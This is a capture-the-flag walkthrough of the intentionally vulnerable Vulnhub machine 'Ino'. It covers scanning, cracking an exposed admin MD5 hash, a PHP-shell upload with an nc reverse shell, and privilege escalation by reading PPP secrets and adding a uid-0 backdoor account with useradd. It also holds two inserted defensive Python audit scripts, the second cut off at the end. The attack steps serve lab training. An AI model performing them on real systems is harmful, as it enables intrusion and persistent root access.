Ino
Author: jason_huawen
Target machine basics
Name: INO: 1.0.1
Address:
https://www.vulnhub.com/entry/ino-101,601/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.77.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:12:e3:78 1 60 PCS Systemtechnik GmbH
192.168.56.219 08:00:27:a7:0f:c9 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.218.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.219 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 09:55 EST
Nmap scan report for localhost (192.168.56.218)
Host is up (0.00030s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A7:0F:C9 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP).
Get Access
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ nikto -h http://192.168.56.219/lot/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.219
+ Target Hostname: 192.168.56.219
+ Target Port: 80
+ Start Time: 2022-11-25 02:11:28 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: POST, OPTIONS, HEAD, GET
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected
+ Scan terminated: 19 error(s) and 6 item(s) reported on remote host
+ End Time: 2022-11-25 02:12:10 (GMT-5) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/25 02:12:31 Starting gobuster in directory enumeration mode
===============================================================
/lot (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status (Status: 403) [Size: 279]
Progress: 217184 / 220561 (98.47%)===============================================================
2022/11/25 02:12:59 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,php
[+] Timeout: 10s
===============================================================
2022/11/25 02:13:13 Starting gobuster in directory enumeration mode
===============================================================
Error: error on running gobuster: unable to connect to http://192.168.56.219/: Get "http://192.168.56.219/": dial tcp 192.168.56.219:80: connect: connection refused
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/25 02:13:30 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 302) [Size: 1] [--> /lot/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/lot (Status: 301) [Size: 314] [--> http://192.168.56.219/lot/]
/server-status (Status: 403) [Size: 279]
Progress: 1100246 / 1102805 (99.77%)===============================================================
2022/11/25 02:15:56 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ gobuster dir -u http://192.168.56.219/lot -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.219/lot
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: php,html,txt,sh
[+] Timeout: 10s
===============================================================
2022/11/25 02:16:19 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/index.php (Status: 200) [Size: 17722]
/about.php (Status: 200) [Size: 679]
/home.php (Status: 200) [Size: 5188]
/header.php (Status: 200) [Size: 1894]
/admin (Status: 301) [Size: 320] [--> http://192.168.56.219/lot/admin/]
/assets (Status: 301) [Size: 321] [--> http://192.168.56.219/lot/assets/]
/footer.php (Status: 200) [Size: 4393]
/css (Status: 301) [Size: 318] [--> http://192.168.56.219/lot/css/]
/database (Status: 301) [Size: 323] [--> http://192.168.56.219/lot/database/]
/js (Status: 301) [Size: 317] [--> http://192.168.56.219/lot/js/]
/head.php (Status: 200) [Size: 0]
/reserve.php (Status: 200) [Size: 2518]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
Progress: 1101943 / 1102805 (99.92%)===============================================================
2022/11/25 02:18:57 Finished
===============================================================
After a round of directory and file scanning, a /database directory turned up; it contains the following file:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ curl http://192.168.56.219/lot/database/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /lot/database</title>
</head>
<body>
<h1>Index of /lot/database</h1>
<table>
<tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
<tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/lot/">Parent Directory</a></td><td> </td><td align="right"> - </td><td> </td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="lot_db.sql">lot_db.sql</a></td><td align="right">2020-10-20 09:59 </td><td align="right"> 12K</td><td> </td></tr>
<tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.38 (Debian) Server at 192.168.56.219 Port 80</address>
</body></html>
Download the database file lot_db.sql to the local Kali Linux machine; inspecting it reveals a username and password:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ mv ~/Downloads/lot_db.sql .
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ cat lot_db.sql
-- phpMyAdmin SQL Dump
-- version 5.0.2
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: Oct 20, 2020 at 03:59 AM
-- Server version: 10.4.14-MariaDB
-- PHP Version: 7.2.33
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `lot_db`
--
-- --------------------------------------------------------
--
-- Table structure for table `division`
--
CREATE TABLE `division` (
`id` int(30) NOT NULL,
`name` varchar(100) NOT NULL,
`description` text NOT NULL,
`map_img` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `division`
--
INSERT INTO `division` (`id`, `name`, `description`, `map_img`) VALUES
(3, 'Phase 1', 'Sample', '1603089660_devSitePlansTileMobile02.jpg'),
(4, 'Phase 2 ', 'Sample only', '1603089960_devSitePlansTileMobile01.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `lots`
--
CREATE TABLE `lots` (
`id` int(30) NOT NULL,
`division_id` int(30) NOT NULL,
`marker_position` text NOT NULL,
`model_id` int(30) NOT NULL,
`lot` text NOT NULL,
`type` tinyint(1) NOT NULL DEFAULT 1 COMMENT '1=lot ,2= house and lot',
`details` text NOT NULL,
`price` float NOT NULL,
`status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=unavailable,1=available,2 = reserve'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `lots`
--
INSERT INTO `lots` (`id`, `division_id`, `marker_position`, `model_id`, `lot`, `type`, `details`, `price`, `status`) VALUES
(2, 3, '{\"top\":\"200px\",\"left\":\"233px\"}', 1, 'Lot 1 Block 1', 2, '<b>Area: 6400 sq. ft.</b><p><ul><li><b>sample</b></li><li><b>sample</b></li><li><b>sample</b></li><li><b>sample</b></li></ul><p><span style="color: rgb(0, 0, 0); font-family: "Open Sans", Arial, sans-serif; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis.</span><b></p></p>', 15000, 0),
(3, 4, '{\"top\":\"148px\",\"left\":\"248px\"}', 0, 'Lot 2 Block 1', 1, 'Sample only', 500000, 1),
(4, 4, '{\"top\":\"85px\",\"left\":\"363px\"}', 1, 'Lot 23 Block 6', 2, '<ul><li>Sample</li><li>Sample</li><li>sample</li><li>Test</li></ul><p><b style="margin: 0px; padding: 0px; color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">Lorem Ipsum</b><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#x2019;s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p>', 2300000, 1);
-- --------------------------------------------------------
--
-- Table structure for table `model_houses`
--
CREATE TABLE `model_houses` (
`id` int(30) NOT NULL,
`title` varchar(250) NOT NULL,
`description` text NOT NULL,
`cover` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `model_houses`
--
INSERT INTO `model_houses` (`id`, `title`, `description`, `cover`) VALUES
(1, 'Two-Story House', '<b>Area:150 sq. m.</b><p><ul><li>3 Bed Rooms</li><li>1 Comfort Room each Floor</li><li>Kitchen Area</li><li>Dining Area</li><li>Sample</li><li>Sample</li></ul></p>', '1603095120_images.jpg'),
(2, 'Sample Model House', '<span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam pretium tortor a sem ultrices faucibus. Aenean placerat efficitur venenatis. Sed eros metus, imperdiet sit amet mauris eget, vehicula pellentesque justo. Proin ac nunc sed est ornare placerat. Mauris quis orci fringilla mauris imperdiet mattis. Nam nibh leo, sollicitudin eget massa ut, consectetur pellentesque nulla. Curabitur quis mi faucibus, interdum elit sed, auctor ex. Aenean elementum ac lorem ut feugiat. Praesent varius, tortor consectetur varius iaculis, erat sem malesuada velit, in lobortis dolor nibh mollis lectus. Etiam elementum sodales ultricies. Donec non odio non urna laoreet malesuada. Donec tincidunt, purus id condimentum dapibus, tortor risus venenatis leo, in molestie lorem ante ut dui. Mauris pulvinar augue nisl, ut commodo leo blandit tristique. In hac habitasse platea dictumst. Nunc semper, nisi ac aliquet lacinia, eros massa dapibus lacus, eu interdum turpis mi vitae nisi.</span><p><ul><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li><li><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; text-align: justify;">sample</span></li></ul></p>', '1603095180_images.jpg');
-- --------------------------------------------------------
--
-- Table structure for table `reserved`
--
CREATE TABLE `reserved` (
`id` int(30) NOT NULL,
`lot_id` int(30) NOT NULL,
`firstname` varchar(100) NOT NULL,
`middlename` varchar(100) NOT NULL,
`lastname` varchar(100) NOT NULL,
`email` varchar(100) NOT NULL,
`contact` varchar(100) NOT NULL,
`address` text NOT NULL,
`message` text NOT NULL,
`status` tinyint(1) NOT NULL DEFAULT 1 COMMENT '0=declined/backed out,1= reserved,2=confimed',
`date_created` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `reserved`
--
INSERT INTO `reserved` (`id`, `lot_id`, `firstname`, `middlename`, `lastname`, `email`, `contact`, `address`, `message`, `status`, `date_created`) VALUES
(2, 2, 'Jsmith', 'C', 'Smith', '[email protected]', '0123456548', 'Sample', 'Sample only', 2, '2020-10-20 09:12:10');
-- --------------------------------------------------------
--
-- Table structure for table `system_settings`
--
CREATE TABLE `system_settings` (
`id` int(30) NOT NULL,
`name` text NOT NULL,
`email` varchar(200) NOT NULL,
`contact` varchar(20) NOT NULL,
`cover_img` text NOT NULL,
`about_content` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `system_settings`
--
INSERT INTO `system_settings` (`id`, `name`, `email`, `contact`, `cover_img`, `about_content`) VALUES
(1, 'Lot Reservation Management System', '[email protected]', '+6948 8542 623', '1603096200_1602738120_pngtree-purple-hd-business-banner-image_5493.jpg', '<p style="text-align: center; background: transparent; position: relative;"><span style="color: rgb(0, 0, 0); font-family: &quot;Open Sans&quot;, Arial, sans-serif; font-weight: 400; text-align: justify;">&nbsp;is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.</span><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p style="text-align: center; background: transparent; position: relative;"><br></p><p></p>');
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(30) NOT NULL,
`name` text NOT NULL,
`username` varchar(200) NOT NULL,
`password` text NOT NULL,
`type` tinyint(1) NOT NULL DEFAULT 3 COMMENT '1=Admin,2=Staff, 3= subscriber'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `name`, `username`, `password`, `type`) VALUES
(1, 'Administrator', 'admin', '0192023a7bbd73250516f069df18b500', 1);
--
-- Indexes for dumped tables
--
--
-- Indexes for table `division`
--
ALTER TABLE `division`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `lots`
--
ALTER TABLE `lots`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `model_houses`
--
ALTER TABLE `model_houses`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `reserved`
--
ALTER TABLE `reserved`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `system_settings`
--
ALTER TABLE `system_settings`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `division`
--
ALTER TABLE `division`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `lots`
--
ALTER TABLE `lots`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `model_houses`
--
ALTER TABLE `model_houses`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `reserved`
--
ALTER TABLE `reserved`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `system_settings`
--
ALTER TABLE `system_settings`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(30) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$
The file contains the username admin together with the hashed password: 0192023a7bbd73250516f069df18b500
Use the hash-identifier tool to identify the hashing algorithm:
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ hash-identifier
#########################################################################
#  hash-identifier v1.2   By Zion3R   www.Blackploit.com   [email protected]  #
#########################################################################
--------------------------------------------------
HASH: 0192023a7bbd73250516f069df18b500
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4
[+] MD2
[+] MD5(HMAC)
[+] MD4(HMAC)
[+] MD2(HMAC)
[+] MD5(HMAC(Wordpress))
[+] Haval-128
[+] Haval-128(HMAC)
[+] RipeMD-128
[+] RipeMD-128(HMAC)
[+] SNEFRU-128
[+] SNEFRU-128(HMAC)
[+] Tiger-128
[+] Tiger-128(HMAC)
[+] md5($pass.$salt)
[+] md5($salt.$pass)
[+] md5($salt.$pass.$salt)
[+] md5($salt.$pass.$username)
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($pass.$salt))
[+] md5($salt.md5($salt.$pass))
[+] md5($salt.md5(md5($pass).$salt))
[+] md5($username.0.$pass)
[+] md5($username.LF.$pass)
[+] md5($username.md5($pass).$salt)
[+] md5(md5($pass))
[+] md5(md5($pass).$salt)
[+] md5(md5($pass).md5($salt))
[+] md5(md5($salt).$pass)
[+] md5(md5($salt).md5($pass))
[+] md5(md5($username.$pass).$salt)
[+] md5(md5(md5($pass)))
[+] md5(md5(md5(md5($pass))))
[+] md5(md5(md5(md5(md5($pass)))))
[+] md5(sha1($pass))
[+] md5(sha1(md5($pass)))
[+] md5(sha1(md5(sha1($pass))))
[+] md5(strtoupper(md5($pass)))
--------------------------------------------------
HASH: ^C
Bye!
Having identified the algorithm as MD5, look the hash up on an online MD5 reverse-lookup site:
https://www.cmd5.com/
This yields the password admin123.
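As an added example (not part of the original write-up), the following Python audit script parses the `users` INSERT from a phpMyAdmin dump in the same shape as lot_db.sql, flags any stored value that is a bare 32-hex digest as probable unsalted MD5, checks it against a small constructed common-password list (which is exactly why the admin hash above was recoverable from a lookup site), and shows the salted PBKDF2 scheme that should replace it. The second user row and the wordlist are constructed; only the admin row is taken from the dump.

```python
import hashlib
import hmac
import os
import re

# Constructed excerpt in the shape of the phpMyAdmin dump exposed under /lot/database/.
# Row 1 is the admin row the dump actually contains; row 2 is made up for contrast.
DUMP_EXCERPT = """\
INSERT INTO `users` (`id`, `name`, `username`, `password`, `type`) VALUES
(1, 'Administrator', 'admin', '0192023a7bbd73250516f069df18b500', 1),
(2, 'Staff', 'staff', 'ffffffffffffffffffffffffffffffff', 2);
"""

# Constructed stand-in for the common-password list an auditor would run.
COMMON_PASSWORDS = ["password", "123456", "admin", "admin123", "letmein"]

USERS_INSERT_RE = re.compile(r"INSERT INTO `users`.*?VALUES(.*?);", re.S)
ROW_RE = re.compile(r"\((\d+),\s*'([^']*)',\s*'([^']*)',\s*'([^']*)',\s*(\d+)\)")
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_users(dump):
    """Return the rows of the `users` INSERT as dicts (empty list if absent)."""
    m = USERS_INSERT_RE.search(dump)
    if not m:
        return []
    return [{"id": int(i), "name": n, "username": u, "password": p, "type": int(t)}
            for i, n, u, p, t in ROW_RE.findall(m.group(1))]


def looks_like_unsalted_md5(stored):
    """A bare 32-hex value with no algorithm tag or salt is the weak-scheme signature."""
    return bool(HEX32_RE.match(stored))


def audit_users(dump, wordlist=COMMON_PASSWORDS):
    """Flag weak-scheme rows and record whether a common password reproduces the digest."""
    findings = []
    for row in parse_users(dump):
        if not looks_like_unsalted_md5(row["password"]):
            continue
        match = next((w for w in wordlist
                      if hashlib.md5(w.encode()).hexdigest() == row["password"]), None)
        findings.append({"username": row["username"], "is_admin": row["type"] == 1,
                         "cracked": match})
    return findings


# Hardened scheme: per-user random salt plus a slow KDF, self-describing on disk.
def hash_password(password, salt=None, iterations=600_000):
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Constant-time verification; anything not in the tagged format is rejected."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)
```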
The directory scan had already revealed the /admin entry point; log in with the username and password.
Next, look for somewhere to upload a PHP shell file.
The Division List page offers a file upload, and the file is accepted without error. Now work out how to reach shell.php.
Clicking view is enough to get the reverse shell back.
┌──(kali㉿kali)-[~/Vulnhub/Ino]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.219] 37322
Linux ino 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64 GNU/Linux
07:29:55 up 3:08, 0 users, load average: 0.00, 0.74, 1.50
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@ino:/$
www-data@ino:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 root root 4.0K Oct 10 2020 .
drwxr-xr-x 18 root root 4.0K Oct 27 2020 ..
drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 ppp
www-data@ino:/home$ cd ppp
cd ppp
www-data@ino:/home/ppp$ ls -alh
ls -alh
total 24K
drwxr-xr-x 2 ppp ppp 4.0K Dec 5 2020 .
drwxr-xr-x 3 root root 4.0K Oct 10 2020 ..
lrwxrwxrwx 1 root root 9 Dec 5 2020 .bash_history -> /dev/null
-rw-r--r-- 1 ppp ppp 220 Oct 10 2020 .bash_logout
-rw-r--r-- 1 ppp ppp 3.5K Oct 10 2020 .bashrc
-rw-r--r-- 1 ppp ppp 807 Oct 10 2020 .profile
-rw-r--r-- 1 ppp ppp 33 Dec 5 2020 local.txt
www-data@ino:/home/ppp$ cat local.txt
cat local.txt
f29cea45f473ebfa834885c4ff70ec1a
www-data@ino:/home/ppp$
User flag obtained.
Privilege escalation
After some searching, the database connection file turns up:
www-data@ino:/var/www/html/lot/admin$ cat db_connect.php
cat db_connect.php
<?php
$conn= new mysqli('localhost','lot','lot','lot_db')or die("Could not connect to mysql".mysqli_error($con));
www-data@ino:/var/www/html/lot/admin$ mysql -ulot -p
mysql -ulot -p
Enter password: lot
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 179
Server version: 10.3.23-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
The database login succeeds, but there is no route to escalate privileges through the database. PPP is in fact a service, so look for its related files:
www-data@ino:/var/www/html/lot/admin$ cd /etc/ppp
cd /etc/ppp
www-data@ino:/etc/ppp$ ls -alh
ls -alh
total 68K
drwxr-xr-x 7 root dip 4.0K Oct 26 2020 .
drwxr-xr-x 94 root root 4.0K Dec 6 2020 ..
-rw-r--r-- 1 root root 101 Oct 26 2020 chap-secrets
-rwxr-xr-x 1 root root 1.8K Feb 20 2020 ip-down
drwxr-xr-x 2 root root 4.0K Oct 26 2020 ip-down.d
-rwxr-xr-x 1 root root 1.9K Feb 20 2020 ip-up
drwxr-xr-x 2 root root 4.0K Oct 26 2020 ip-up.d
-rwxr-xr-x 1 root root 784 Feb 20 2020 ipv6-down
drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-down.d
-rwxr-xr-x 1 root root 922 Feb 20 2020 ipv6-up
drwxr-xr-x 2 root root 4.0K Feb 20 2020 ipv6-up.d
-rw-r--r-- 1 root root 13K Feb 20 2020 options
-rw------- 1 root root 1.6K Oct 26 2020 pap-secrets
drwxr-s--- 2 root dip 4.0K Oct 26 2020 peers
www-data@ino:/etc/ppp$ cat chap-secrets
cat chap-secrets
# Secrets for authentication using CHAP
# client server secret IP addresses
ppp * ESRxd7856HVJB *
This exposes the ppp user's password. Switch to the ppp user, then use the useradd command to create a superuser:
ppp@ino:~$ sudo useradd -p `openssl passwd 123456` hacker -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
< -o -u 0 -g root -G root -s /bin/sh -d /home/hacker
ppp@ino:~$ su - hacker
su - hacker
Password: 123456
su: warning: cannot change directory to /home/hacker: No such file or directory
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
21bae0a12690199cde7a65bff57723a5
#
Privilege escalation successful!
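Added example, not from the original write-up: the backdoor created above is a second account with uid 0 (`useradd -o -u 0`), which leaves an unmistakable trace in /etc/passwd. This Python check parses a constructed /etc/passwd excerpt modelled on the box after that step and reports every non-root uid-0 account, every shared uid, and every login account whose home directory is missing (the `su: warning` above is that symptom). The `exists` predicate is injectable so the check runs offline; run without arguments it audits the live /etc/passwd.

```python
import os
import sys

# Constructed /etc/passwd excerpt modelled on the box after the write-up's
# `useradd -o -u 0 -g root ... -s /bin/sh -d /home/hacker` step.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ppp:x:1000:1000:ppp,,,:/home/ppp:/bin/bash
hacker:x:0:0::/home/hacker:/bin/sh
"""


def parse_passwd(text):
    """Split passwd(5) lines into dicts; raise on malformed lines rather than skip them."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
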